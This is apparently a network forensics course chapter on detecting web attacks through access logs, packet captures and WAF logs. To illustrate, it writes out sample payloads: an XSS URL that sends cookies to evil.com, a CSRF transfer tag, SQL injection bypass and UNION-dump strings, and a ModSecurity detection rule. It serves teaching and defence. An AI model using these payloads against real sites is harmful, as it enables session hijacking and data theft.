Week 7 Addendum: Detecting Web Attacks

1. Introduction

The Web Attack Surface

In contemporary network architectures, public-facing web applications represent the most exposed and frequently engaged attack surface. By their very design, web servers must accept unsolicited inbound connections from untrusted sources (the public internet) to function. This operational necessity creates a direct gateway through the perimeter firewall, routing traffic directly to backend databases, internal application programming interfaces (APIs), and legacy infrastructure. At Layer 7 (the Application Layer) of the OSI model, adversaries systematically target web applications not merely to deface a webpage, but to establish an initial foothold, exfiltrate sensitive data, or pivot into the internal network.

The Forensic Imperative

Traditional security operations often focus on the binary outcome of an attack: was it blocked or was it successful? Network forensics demands a more rigorous, first-principle approach. When investigating a web-based intrusion, the forensic analyst must reconstruct the temporal sequence of events. The imperative is not just isolation, but comprehension. Analysts must parse ephemeral network traffic and static log data to answer fundamental questions: What was the initial attack vector? What vulnerabilities were targeted? Was data successfully exfiltrated, or did the payload fail to execute?

Learning Objectives

By the end of this chapter, students will be able to:

Differentiate between the mechanics of client-side and server-side web attacks.
Evaluate the limitations of server-side telemetry when investigating client-side execution.
Identify anomalous patterns indicative of directory fuzzing and authentication abuse within web access logs.
Analyze the syntax of SQL injection (SQLi) payloads and determine the success or failure of an attack based on server responses.

2. Client-Side Attacks

Core Principle

To understand client-side attacks, one must first isolate where the malicious execution occurs. In these scenarios, the web server is merely a delivery mechanism; it is neither the target nor the victim. The attack exploits the trust established between the end-user and the browser environment. By manipulating the code delivered to the client, adversaries force the victim's local machine to execute malicious instructions.

Threat Mechanics: Cross-Site Scripting (XSS)

XSS occurs when an application includes untrusted data in a web page without proper validation or escaping. The victim's browser executes the injected script under the assumption that it originated from the trusted domain. This allows the attacker to hijack session cookies or redirect the user. We categorize XSS primarily into two types based on how the payload is delivered:

1. Reflected XSS (Non-Persistent) The malicious payload is embedded directly within the request URL or form input and immediately "reflected" back by the web server in its HTTP response.

Step-by-Step Walkthrough:
1. Crafting the Vector: An attacker crafts a malicious URL containing a JavaScript payload within a parameter (e.g., http://trustedbank.com/search?query=<script>fetch('http://evil.com/?cookie='+document.cookie)</script>).
2. Delivery: The attacker tricks the victim into clicking this specific link via a phishing email or malicious message.
3. Reflection: The victim's browser sends the request to the legitimate server. The server's search function takes the query parameter and embeds it directly into the HTML response: Results for: <script>...</script>.
4. Execution: The victim's browser renders the HTML, encounters the <script> tags, and executes the payload, silently sending the user's session cookie to the attacker's server.

2. Stored XSS (Persistent) The malicious payload is permanently saved (stored) on the target server's database (e.g., in a forum post, user profile, or comment section).

Step-by-Step Walkthrough:
1. Injection: The attacker locates a vulnerable input field, such as a product review section, and submits a malicious script instead of standard text.
2. Storage: The web server fails to sanitize the input and saves the script directly into its backend database.
3. Retrieval: A legitimate user navigates to the product page.
4. Execution: The server retrieves the reviews from the database and serves them to the user's browser. The browser executes the attacker's script silently in the background of the victim's session.

Threat Mechanics: Cross-Site Request Forgery (CSRF)

While XSS exploits the user's trust in the browser, CSRF exploits the web application's trust in the user's browser.

Step-by-Step Walkthrough:
1. Authentication: The victim logs into their bank (bank.com), establishing a valid session cookie.
2. Lure: In a separate tab, the victim browses to an attacker-controlled site (evil.com).
3. Forged Request: The attacker's site contains hidden code (like an invisible <img> tag) that forces the browser to make a request to the bank: <img src="http://bank.com/transfer?amount=1000&toAccount=Attacker">.
4. Exploitation: The victim's browser automatically appends the bank.com session cookie to the request. The bank sees a valid, authenticated request and executes the transfer.

Forensic Visibility Challenges

Client-side attacks present significant blind spots for network forensic analysts relying solely on server-side infrastructure. Because the execution of an XSS payload happens entirely within the volatile memory of the victim's local browser, server access logs will only reflect a standard GET or POST request. The server successfully delivered the requested HTML/JS; it has no awareness of how that code behaved once rendered. Detecting these attacks typically requires endpoint telemetry, browser history forensics, or analyzing full packet captures (PCAPs) for anomalous outbound requests originating from the client.

3. Server-Side Attacks

Core Principle

In direct contrast to client-side vectors, server-side attacks target the infrastructure, the application logic, or the backend databases. Here, the web server is the victim. The execution of the exploit occurs on the server's hardware, manipulating the application's intended behavior to bypass access controls, extract unauthorized data, or achieve remote code execution (RCE).

Threat Mechanics: Directory Fuzzing and Content Discovery

Before an attacker can exploit a vulnerability, they must map the application's structure to find unlinked, hidden, or unprotected resources (e.g., /admin, /backup.zip, /api/v1/users).

Step-by-Step Walkthrough:
1. Wordlist Selection: The attacker selects a text file containing thousands of common directory names and file extensions.
2. Automated Iteration: Using tools like Gobuster or ffuf, the attacker automates HTTP GET requests to the target server, appending each word from the list to the base URL.
3. Response Analysis: The tool parses the server's HTTP status codes. A 404 Not Found indicates the resource does not exist. A 200 OK or 403 Forbidden indicates the resource exists, providing the attacker with a new target.

Threat Mechanics: Authentication Abuse (Brute-Force)

Adversaries routinely target login portals to gain unauthorized access by systematically guessing credentials.

Step-by-Step Walkthrough:
1. Target Identification: The attacker identifies the authentication endpoint (e.g., POST /login.php).
2. Payload Generation: The attacker configures a tool (like Hydra or Burp Suite Intruder) with a known username (e.g., admin) and a dictionary of common passwords.
3. Execution: The tool fires rapid POST requests, swapping the password parameter on each attempt.
4. Validation: The attacker analyzes the HTTP responses. Failed attempts will typically return a 401 Unauthorized. A successful attempt often triggers a 302 Found redirect to a dashboard (e.g., Location: /admin_dashboard.php), signaling a breach.

Threat Mechanics: SQL Injection (SQLi)

Web applications frequently construct dynamic database queries based on user input. If this input is not properly sanitized, an attacker can append their own SQL commands, altering the underlying logic of the query executed by the backend database.

Step-by-Step Walkthrough (Authentication Bypass):
1. The Flawed Logic: The backend PHP code expects a username and password to construct this query: SELECT * FROM users WHERE username = '$user' AND password = '$password';
2. The Injection: The attacker inputs admin' OR '1'='1 into the username field and leaves the password blank.
3. The Manipulation: The application concatenates the input blindly, sending this query to the database: SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = '';
4. The Execution: Because '1'='1' is mathematically true, the WHERE clause evaluates to true for the entire database table.
5. The Result: The database returns the first record (usually the administrator), and the application logs the attacker in without a valid password.

Note

This is a very simple example of SQLi. Depending on the attackers knowledge of the SQL language, they could craft much more detailed and complex malicious queries to dump other parts of the database or to identify the overall database schema. Input validation is the best form of protection against this vulnerability, which has to be implemented by the developers as they write the code. This essentially would disallow an attacker from using specific characters like `, ', =, etc. that are required for these kinds of attacks.

Forensic Visibility

Because server-side attacks directly interact with the application and its underlying infrastructure, they generate a high volume of forensic artifacts.

Fuzzing leaves a distinct signature of rapid, sequential requests from a single IP resulting in high volumes of 404 Not Found status codes, often accompanied by non-standard User-Agent strings indicative of automated tooling (e.g., User-Agent: gobuster/3.1.0).
Authentication Abuse is highly visible as clusters of POST requests targeting a specific authentication URI, resulting in repeated failed states followed by a sudden state change (like a session cookie issuance or a 302 redirect).
SQL Injection artifacts are frequently captured in both network packet captures and server access logs, as the malicious SQL syntax (often URL-encoded, like %27+OR+%271%27%3D%271) is directly visible within the URI of a GET request or extractable from the payload body of a POST request in a PCAP.

4. Log-Based Detection

Core Principle

Web servers generate continuous, standardized records of every client interaction. For the network forensic analyst, these access logs serve as the foundational timeline of an incident. Log-based detection operates on the principle of anomaly identification: by establishing a baseline of legitimate user behavior, analysts can programmatically or manually identify the statistical deviations and malicious signatures indicative of an attack.

Anatomy of an Access Log

Before attempting to detect anomalies, one must understand the structure of the baseline. Most web servers (including Apache and Nginx) utilize the NCSA Extended/Combined Log Format.

Consider the following standard log entry: 192.168.1.50 - - [20/Feb/2026:14:22:10 -0500] "GET /about.html HTTP/1.1" 200 5120 "http://example.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."

Let us break down this string into its forensic components:

192.168.1.50 (Client IP): The origin of the request.
- - (Identity & User): Typically unused (hyphens) unless HTTP authentication is explicitly configured.
[20/Feb/2026:14:22:10 -0500] (Timestamp): The exact server time the request was processed, critical for timeline reconstruction.
"GET /about.html HTTP/1.1" (Request Line): Contains the HTTP Method (GET), the requested Uniform Resource Identifier (URI), and the protocol version.
200 (Status Code): The server's response. 200 indicates success.
5120 (Size): The size of the returned object in bytes.
"http://example.com/home" (Referer): The page that linked the user to this requested URI.
"Mozilla/5.0..." (User-Agent): The client application (browser, OS, or automated tool) making the request.

Identifying Attack Signatures in Logs

By analyzing access logs, analysts can reconstruct the methodology of server-side attacks through distinct temporal and structural patterns.

1. Directory Fuzzing Signature

Fuzzing tools generate highly anomalous traffic patterns characterized by speed, volume, and failure rates.

Forensic Indicators: * A single IP address making hundreds of requests per second. * A high ratio of 404 Not Found status codes as the tool guesses incorrect directories. * Suspicious or default User-Agent strings belonging to known offensive tools.

Log Example:

10.10.10.99 - - [20/Feb/2026:15:01:01 -0500] "GET /admin HTTP/1.1" 403 125 "-" "gobuster/3.1.0"
10.10.10.99 - - [20/Feb/2026:15:01:01 -0500] "GET /administrator HTTP/1.1" 404 212 "-" "gobuster/3.1.0"
10.10.10.99 - - [20/Feb/2026:15:01:01 -0500] "GET /backup.zip HTTP/1.1" 200 85400 "-" "gobuster/3.1.0"

Analysis: The attacker (10.10.10.99) is using Gobuster. They discovered an accessible /backup.zip file (indicated by the 200 OK status and the large 85,400-byte response size), which represents a severe data leak.

2. Authentication Abuse (Brute-Force) Signature

Brute-force attacks against login portals leave a trail of repeated state-change requests.

Forensic Indicators:

Clusters of POST requests targeting the same authentication endpoint (e.g., /login).
Identical response sizes for failed attempts (as the server repeatedly returns the same "Invalid Password" HTML page).
A sudden shift in the HTTP status code from a 401 (Unauthorized) to a 302 Found (redirect to an authenticated dashboard), indicating a successful compromise.

Log Example:

10.10.10.99 - - [20/Feb/2026:15:10:22 -0500] "POST /login.php HTTP/1.1" 401 450 "-" "Hydra"
10.10.10.99 - - [20/Feb/2026:15:10:23 -0500] "POST /login.php HTTP/1.1" 401 450 "-" "Hydra"
10.10.10.99 - - [20/Feb/2026:15:10:24 -0500] "POST /login.php HTTP/1.1" 302 0 "-" "Hydra"
10.10.10.99 - - [20/Feb/2026:15:10:25 -0500] "GET /dashboard.php HTTP/1.1" 200 8900 "-" "Hydra"

Analysis: The attacker utilized Hydra. The first two attempts failed (Status 401, size 450). The third attempt succeeded, resulting in a 302 redirect, followed immediately by the attacker accessing the protected /dashboard.php.

3. SQL Injection (SQLi) Signature in GET Requests

When SQLi payloads are delivered via the URL (HTTP GET), the malicious syntax is captured directly in the log's Request Line.

Forensic Indicators:

Unexpected characters in URL parameters (e.g., ', ", ;, --).
The presence of SQL keywords (UNION, SELECT, SLEEP) which are often URL-encoded by the browser or tool.

Log Example:

10.10.10.99 - - [20/Feb/2026:15:20:00 -0500] "GET /item.php?id=1%27+UNION+SELECT+username,password+FROM+users-- HTTP/1.1" 200 1024 "-" "Mozilla/5.0..."

Analysis: The attacker injected a UNION-based SQL payload. Notice the URL encoding: %27 is a single quote ('), and + represents a space. The server returned a 200 OK, suggesting the query executed and the data may have been reflected to the attacker.

Limitations of Log Analysis

While indispensable, web server logs possess a critical forensic blind spot: they do not capture the HTTP message body. In the brute-force example above, the log proves the attacker sent POST requests, but it cannot reveal which passwords they guessed, nor the specific password that finally granted access. To achieve full Layer 7 visibility, analysts must pivot from logs to network packet captures.

5. Network-Based Detection

Core Principle

Network-based detection utilizes deep packet inspection (DPI) to uncover the complete context of an attack sequence. By capturing and analyzing raw network traffic in a Packet Capture (PCAP) format, forensic analysts transcend the metadata provided by logs and examine the actual data payload exchanged between the client and the server.

Packet Capture (PCAP) Fundamentals

To analyze PCAPs, analysts rely on protocol analyzers like Wireshark. Because web servers handle massive volumes of traffic, identifying the malicious needle in the haystack requires precise filtering. Berkeley Packet Filters (BPF) and Wireshark display filters allow analysts to isolate specific behaviors.

http.request.method == "POST" (Isolates form submissions and logins)
http.response.code == 302 (Isolates redirects, often following a successful login)
ip.addr == 10.10.10.99 (Isolates all traffic to/from a known attacker IP)

Following the HTTP Stream

When investigating an HTTP attack, looking at isolated packets is inefficient. Wireshark's "Follow HTTP Stream" feature reassembles the fragmented packets back into a continuous, human-readable conversation, displaying the client's request (typically in red) and the server's response (typically in blue).

Uncovering the "Unseen" Payload

The primary advantage of PCAP analysis is the ability to inspect the HTTP body, resolving the blind spots inherent in server logs.

1. Extracting Brute-Force Credentials: While a log only shows that a POST request occurred, the PCAP stream reveals the exact clear-text parameters submitted by the attacker. * PCAP Stream View:

POST /login.php HTTP/1.1
Host: 192.168.1.50
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

username=admin&password=P@ssw0rd123!

By analyzing the stream associated with the 302 Found success log, the analyst can definitively identify the compromised password and immediately initiate an account reset.

2. Validating SQL Exfiltration: If an attacker uses a boolean-based or UNION-based SQL injection, the server log will show a 200 OK. However, the log cannot confirm if sensitive data was actually returned. By following the HTTP stream of the server's response in the PCAP, the analyst can inspect the returned HTML. If the stream contains a database dump or a capture-the-flag (CTF) marker (e.g., THM{flag_found}), the analyst has definitive proof of data exfiltration.

The HTTPS Challenge

It is critical to acknowledge that the depth of visibility provided by PCAP analysis is entirely dependent on the traffic being unencrypted (HTTP). In modern environments, traffic is encrypted via TLS (HTTPS). If an analyst opens an HTTPS PCAP in Wireshark, the Application Layer data (the HTTP headers and body) will be obfuscated ciphertext.

To perform deep packet inspection on HTTPS traffic, the forensic analyst must possess the server's private key or the specific symmetric session keys (often captured via SSLKEYLOGFILE environments) to decrypt the traffic within the protocol analyzer before the HTTP streams can be reconstructed and analyzed.

6. Web Application Firewalls (WAF)

Core Principle

Traditional network firewalls operate at Layer 3 (Network) and Layer 4 (Transport) of the OSI model, making routing decisions based on IP addresses, protocols, and ports. However, web attacks inherently rely on permitted ports—specifically port 80 (HTTP) and port 443 (HTTPS). A traditional firewall will blindly allow a malicious SQL injection payload through because the traffic is utilizing an authorized port.

To defend against Layer 7 (Application) attacks, organizations deploy Web Application Firewalls (WAFs). A WAF acts as a reverse proxy, sitting between the web application and the internet, inspecting the actual HTTP/HTTPS conversation payload before it reaches the backend server.

WAF Detection Mechanics

WAFs utilize a combination of detection methodologies to identify and block malicious web traffic:

Signature-Based Detection: The WAF compares incoming HTTP requests (headers, URIs, and bodies) against a vast database of known attack patterns. For example, if a POST request contains the string <script>alert(1)</script>, the WAF matches this to a known XSS signature and drops the packet.
Behavioral/Anomaly-Based Detection: The WAF establishes a baseline of "normal" application behavior. If an application typically receives GET requests with a single, integer-based parameter (e.g., ?id=5), a sudden POST request to the same endpoint containing 500 lines of encoded text will trigger an anomaly alert.
Virtual Patching: When a new vulnerability (CVE) is discovered in a web application framework, administrators can apply a custom WAF rule to block exploit attempts at the perimeter, buying time to patch the underlying application code.

WAF Forensics

For the network forensic analyst, WAF logs are a goldmine of contextual intelligence. While standard access logs only record the metadata of a transaction, WAF logs explicitly categorize the identified threat.

Forensic Indicators:

Rule ID matches corresponding to established frameworks like the OWASP Top 10.
Action taken by the WAF (e.g., Blocked, Flagged, Simulated).
The specific payload snippet that triggered the alert.

WAF Log Example (ModSecurity Format):

[20/Feb/2026:16:05:12 -0500] [192.168.1.50/sid#7f8b9c] [client 10.10.10.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\s+all\\s+select))" at ARGS:username. [file "/etc/modsecurity/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [severity "CRITICAL"] [hostname "example.com"] [uri "/login.php"]

Analysis: Unlike an Apache log, this ModSecurity WAF log explicitly tells the analyst what happened. The attacker (10.10.10.99) attempted an SQL Injection using a UNION ALL SELECT payload within the username parameter of /login.php. The WAF successfully intercepted the attack at Layer 7 and returned a 403 Forbidden status, actively preventing the exploit.

The Evasion Factor

It is crucial to remember that WAFs are not infallible. Attackers constantly develop bypass techniques using encoding (e.g., Hex, Base64, Unicode) or obfuscation to disguise their payloads from signature-based detection. A sophisticated attacker might bypass the WAF, meaning the malicious payload will execute on the server but will not appear in the WAF alerts, highlighting why analysts cannot rely on a single defensive layer.

7. Chapter Summary

The forensic investigation of web attacks requires a fundamental understanding of the dynamic relationship between the client browser, the network transport layer, and the backend application server.

Key Takeaways

Vector Mechanics Dictate Visibility: Client-side attacks (XSS, CSRF, Clickjacking) weaponize the end-user's browser, leaving minimal forensic footprint on the server itself. Server-side attacks (Directory Fuzzing, Brute-Force, SQLi) target the application logic, generating high volumes of log and network artifacts.
The Limitations of Telemetry: Server access logs provide the temporal metadata of an attack—the who, when, and where. However, they possess a critical blind spot regarding HTTP POST bodies.
The Power of Correlation: First-principle network forensics demands the correlation of multiple data sources.
- Access Logs define the timeline and highlight statistical anomalies.
- Packet Captures (PCAPs) provide the raw truth of the data exchange, exposing exfiltrated data and clear-text payloads within HTTP streams.
- WAF Logs provide immediate threat categorization and context regarding blocked exploits.

By mastering the syntax of these logs and the filtering techniques within protocol analyzers, forensic analysts move beyond simply acknowledging that an attack occurred; they gain the capability to definitively reconstruct the adversary's methodology and determine the precise scope of the compromise.